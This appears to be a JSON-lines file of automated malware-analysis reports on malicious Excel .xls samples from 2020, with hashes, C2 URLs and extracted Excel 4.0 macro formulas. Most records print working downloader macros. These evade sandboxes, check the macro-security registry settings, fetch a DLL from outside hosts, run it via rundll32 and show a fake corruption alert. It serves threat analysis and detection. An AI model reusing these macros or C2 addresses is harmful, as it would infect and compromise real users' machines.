/y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qT6miUPbq0\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42739e664e0e28fb7daef8493900db2788b8aedfdfed585be83def4a06e0f47c"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42739e664e0e28fb7daef8493900db2788b8aedfdfed585be83def4a06e0f47c","filesize":167936,"md5":"6edd39256b19fe3425aed76dfe94dddd","sha1":"1f78900330e0e0c42ebe5a3dc7d1dfa601d467dd","sha256":"42739e664e0e28fb7daef8493900db2788b8aedfdfed585be83def4a06e0f47c","sha512":"07013f63ca3273d5c1a6f5b363a41751c7386e14cb71de031e9cfd3020821b30b8bdf9be867ab9b91da089c3f0ccf16dcafda064e4aab156a6f79e471031a73e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42739e664e0e28fb7daef8493900db2788b8aedfdfed585be83def4a06e0f47c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"h7FCgS8NQ9\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"427d76392c4db085401144d7648c628eb5dad6c999999b58bed468b6b1e5cc8e"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"427d76392c4db085401144d7648c628eb5dad6c999999b58bed468b6b1e5cc8e","filesize":170496,"md5":"6cca51cb26d3e19462235c58a0a3fe6b","sha1":"ee3f41b0cba87593c2a10654847f923e02b4abaa","sha256":"427d76392c4db085401144d7648c628eb5dad6c999999b58bed468b6b1e5cc8e","sha512":"c0165bfd4421c2ac862e9bd3c81bcd405d94ed079652a396858f29cef6edf203eda12d07650ab4c3c31f8c18da17a4e24e57635125ab66a725960b5e0d3bc318","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"427d76392c4db085401144d7648c628eb5dad6c999999b58bed468b6b1e5cc8e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zeH0byGwGy\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"427fbaa7608281e4ee7d077df1990528bf454841eeb0f0b8a1d2f7cd95f62b34"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"427fbaa7608281e4ee7d077df1990528bf454841eeb0f0b8a1d2f7cd95f62b34","filesize":160768,"md5":"19986f395b897aae9ac778481c0e0f58","sha1":"116e85cd40fa4eefec2b503c50d5466b27e94510","sha256":"427fbaa7608281e4ee7d077df1990528bf454841eeb0f0b8a1d2f7cd95f62b34","sha512":"4940dbc80df6432b0dabc3e5f7a99f6d25e2d13fd57f8114879fd64e9d9a77da38331848910a3410c662997db70e7d081d72dccc51ef7aad628e131721c16df0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"427fbaa7608281e4ee7d077df1990528bf454841eeb0f0b8a1d2f7cd95f62b34.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TdHQW6qbyY\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42ab609e75a00821e48589f80b71385f9e48e726b80e21cb0ae0e5f4b2a19c6e"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42ab609e75a00821e48589f80b71385f9e48e726b80e21cb0ae0e5f4b2a19c6e","filesize":99843,"md5":"ad236bf29970c4f990a5e126f5b96d40","sha1":"eb02d0791d6f73c302280a8fd7c6cdc8add1d5e9","sha256":"42ab609e75a00821e48589f80b71385f9e48e726b80e21cb0ae0e5f4b2a19c6e","sha512":"d804c3359fadc97ba1fb3748f402c48aa924bd9c7b2720184bc740d4628cb54bf2c415f2869dced1d0f914774d7e124b978b5e251ae74e9f491fe5aa80d56cef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42ab609e75a00821e48589f80b71385f9e48e726b80e21cb0ae0e5f4b2a19c6e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/files/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\plZtkbp\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\plZtkbp\\ziiVIiF\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/files/crypt.dl\",\"C:\\plZtkbp\\ziiVIiF\\SgNeRVu.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\plZtkbp\\ziiVIiF\\SgNeRVu.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42bea687c9c78926cf9941a845af4405677c5e6ca1867f5945d0a40a2ae2d58b"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42bea687c9c78926cf9941a845af4405677c5e6ca1867f5945d0a40a2ae2d58b","filesize":168960,"md5":"489939b93a7bd40cccb779aeb6d1bf83","sha1":"0fc7d2da86b5fddffa8aa7d79bddc08970ac40ba","sha256":"42bea687c9c78926cf9941a845af4405677c5e6ca1867f5945d0a40a2ae2d58b","sha512":"f5970a0c472ed0d9143c3c7eb5b6b86ac6e151111865ddd23d34c1d098f404f49bf222805a47782173f817332245dc23206f300eda767120df2ac9dfcee703b4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42bea687c9c78926cf9941a845af4405677c5e6ca1867f5945d0a40a2ae2d58b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5FwzAYbwTN\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42cf3aa5f66e040db5659419ef3947d18f7ee0a0cff92300469f9bf51eb23ac5"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42cf3aa5f66e040db5659419ef3947d18f7ee0a0cff92300469f9bf51eb23ac5","filesize":112128,"md5":"ea6774ec8978047d08b9eccd9bfd0958","sha1":"d7704bca0e7d1b306315805246bb7596a9bf6d9c","sha256":"42cf3aa5f66e040db5659419ef3947d18f7ee0a0cff92300469f9bf51eb23ac5","sha512":"4fab9b36da15c685ed44e27a6abc775d0e091b75a7de296c287f0d353ad78e7ff828ea10321e06f0a2a987185b4d214911a5e207cd1d46b4e0ad9c952f72adf3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42cf3aa5f66e040db5659419ef3947d18f7ee0a0cff92300469f9bf51eb23ac5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42e0ae02980018ed00e2b189817f266eac0e4152d89ec59bd28c16a7de2ed169"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42e0ae02980018ed00e2b189817f266eac0e4152d89ec59bd28c16a7de2ed169","filesize":109568,"md5":"f2c48ba1d5207aafe6f3896c360059de","sha1":"b45ea1448fbf1d17d186edc27c943cc94d03d990","sha256":"42e0ae02980018ed00e2b189817f266eac0e4152d89ec59bd28c16a7de2ed169","sha512":"77e7383d3991dc5b8f9a42b218eb7a33a073b41a3e5270d04d38cb7dd833e454bb033da4367318082716925001282e4ca5f6f9ccdd01f77a7cfb72dbc03425d3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42e0ae02980018ed00e2b189817f266eac0e4152d89ec59bd28c16a7de2ed169.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"1wHnRji4VB\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42e1a1d68ecd5d7db1191f76686a79076491696be4a1b11e05cd6d876d975d08"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42e1a1d68ecd5d7db1191f76686a79076491696be4a1b11e05cd6d876d975d08","filesize":167936,"md5":"da4daaee4bd078bda34942bb91177e01","sha1":"13bdb3fa4f64106ade9aff5c58456647bca95871","sha256":"42e1a1d68ecd5d7db1191f76686a79076491696be4a1b11e05cd6d876d975d08","sha512":"0c509c826db1250d086cad2810377ababdd11125f36175e208a0249c02b311b569d08d1ac23c605766774665f85c35f1077147cac654c43d58fc2d39768a2fa7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42e1a1d68ecd5d7db1191f76686a79076491696be4a1b11e05cd6d876d975d08.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eCFd2g6YtC\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42e44a876ce81c0984716763daf50e460f67c6cd7e49021d5c91b5f5619fcd8e"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42e44a876ce81c0984716763daf50e460f67c6cd7e49021d5c91b5f5619fcd8e","filesize":185344,"md5":"fedf455c0f9324e5e812c30fccf8a140","sha1":"ec63f9dd3426b23d56c0a6bf506c9d92780233ec","sha256":"42e44a876ce81c0984716763daf50e460f67c6cd7e49021d5c91b5f5619fcd8e","sha512":"2003de053562be61e20dac7f33e366f669e29a163fafd9a14268f0c16a9bde601ea929767a11e43800d37bcfed3a050eeab52cd6e270b9bcd60fa9c68836c2d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42e44a876ce81c0984716763daf50e460f67c6cd7e49021d5c91b5f5619fcd8e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42e4926a40b5d01c9a602ea42e180cf616e33a5ab07d7f71bc77291f2d2f28fe"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42e4926a40b5d01c9a602ea42e180cf616e33a5ab07d7f71bc77291f2d2f28fe","filesize":147968,"md5":"10057550f6d3f329cc51860d6aa69a51","sha1":"4ce629e2e4496e10c923006d91a116a403d66803","sha256":"42e4926a40b5d01c9a602ea42e180cf616e33a5ab07d7f71bc77291f2d2f28fe","sha512":"3e231dc0e6e20b424ae238863193042772b3c0973927bf64b2b7197eaefcf4e0b93ee045a25afa1e28fa8f5c1045d31752a10667fe87fa4080816508555ad161","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42e4926a40b5d01c9a602ea42e180cf616e33a5ab07d7f71bc77291f2d2f28fe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"kMObWzf7qi\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42e94c88c29e7e0af74805f18e550332471636de7e064b81388410259686353f"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42e94c88c29e7e0af74805f18e550332471636de7e064b81388410259686353f","filesize":145920,"md5":"233353d5dba4b20232258b5a845a4e71","sha1":"5fba5dfdf92f6b98127b897682cad7584dcf4711","sha256":"42e94c88c29e7e0af74805f18e550332471636de7e064b81388410259686353f","sha512":"ac97cdb02788292dd2028e374d3edc5347aa96f9055a7cbd0cb50507ba8bec2327c01deb3fed3dfe7df949d4cacf629afe38363c7d546eaafb7a1778667442d5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42e94c88c29e7e0af74805f18e550332471636de7e064b81388410259686353f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"WNlMFpJ5Ga\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42ea7366e9956ced913915a44a6d537ed44af76e5e47974d95d63004812b67e4"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42ea7366e9956ced913915a44a6d537ed44af76e5e47974d95d63004812b67e4","filesize":185344,"md5":"72eade89ca92de666591d2fda69319e8","sha1":"3ba523cc2a9d439732380ef61a5244277489a728","sha256":"42ea7366e9956ced913915a44a6d537ed44af76e5e47974d95d63004812b67e4","sha512":"2ead768598aed1adeac70c098cc00dd41ef187b9e81d7fd4acfd027e4428f39e6a63466c00195c545745d2846535375386ffe4d946d9e8acbae34bb1ac29e8ee","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42ea7366e9956ced913915a44a6d537ed44af76e5e47974d95d63004812b67e4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42f1e78714bf4e8150383958be7c937c53b147118afcd412a2cea631678c761f"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42f1e78714bf4e8150383958be7c937c53b147118afcd412a2cea631678c761f","filesize":152576,"md5":"bcbaf3da3cc87cd615b2c01edca90f84","sha1":"ee868cfbc7eb80e1e6de6e0f449b8dc9a9b537ec","sha256":"42f1e78714bf4e8150383958be7c937c53b147118afcd412a2cea631678c761f","sha512":"f352f7d6ca01e0eba5d0e1dd79630ccb832f3d09bb6275486d064fea1b1f7b8844acedbc40edd6efe3cf133657927daa60cf88f1a647ea38dbb2615b368139e5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42f1e78714bf4e8150383958be7c937c53b147118afcd412a2cea631678c761f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eljcx3cA26\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42f613e1224d35434866c96cb5a2687b37a735c72f87b50738c48569fcfabfda"},"analysis":{"reported":"2020-04-09T16:16:01Z","score":10},"files":[{"filename":"42f613e1224d35434866c96cb5a2687b37a735c72f87b50738c48569fcfabfda","filesize":116224,"md5":"529876b7cb5cec944f71c990c61ba878","sha1":"2c67e739f628822f41eaa6280b22394a69355007","sha256":"42f613e1224d35434866c96cb5a2687b37a735c72f87b50738c48569fcfabfda","sha512":"f623187854e95ddd2aa3aaf2796188dad0ef8157ade8d4a6db123d74cf4b3fe50e7c1182e3d6424b19e4b2bc750ec33b6474fef963a9e05f947a3baded1cf761","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42f613e1224d35434866c96cb5a2687b37a735c72f87b50738c48569fcfabfda.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1TfuVCClhq\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"431147f4449714b42e52c77ebc74a695218ca8e29fe07df3597df5d7794c5097"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"431147f4449714b42e52c77ebc74a695218ca8e29fe07df3597df5d7794c5097","filesize":152576,"md5":"d031e21b0a096bdfdffddd0474450a60","sha1":"98b3cf019d14b0e9b5c5aebccf5b8b8f36814ebf","sha256":"431147f4449714b42e52c77ebc74a695218ca8e29fe07df3597df5d7794c5097","sha512":"a1e88d208138fae7260469bd66489e69de8244fee776d3b4269eefdfc74a970599cbdfc5a09251322915b65f62f7f35622919b60ae7daaca44252ac46f39a79e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"431147f4449714b42e52c77ebc74a695218ca8e29fe07df3597df5d7794c5097.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UugBhNNoHC\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"43273d48d12b966a88011126edb5e92c038ac50ae9c0c838c19f3fec047fca6c"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"43273d48d12b966a88011126edb5e92c038ac50ae9c0c838c19f3fec047fca6c","filesize":206336,"md5":"d3ad0b121b5edfccae3fec87dbbdba53","sha1":"906100efa6cfe70e570ff88d495c6946e30a2460","sha256":"43273d48d12b966a88011126edb5e92c038ac50ae9c0c838c19f3fec047fca6c","sha512":"ec2f121ae27fe42c018d8057840a34b8423780f549d5ade5078dd8049299674d7880ec0ea4fdb47d57ad3ca312ed4421d1b0b1d5fbe5f7615c7576c2e5598834","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"43273d48d12b966a88011126edb5e92c038ac50ae9c0c838c19f3fec047fca6c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1QPHDqBBPT\",TRUE)\nGOTO(R$0C$18)"}}}]}
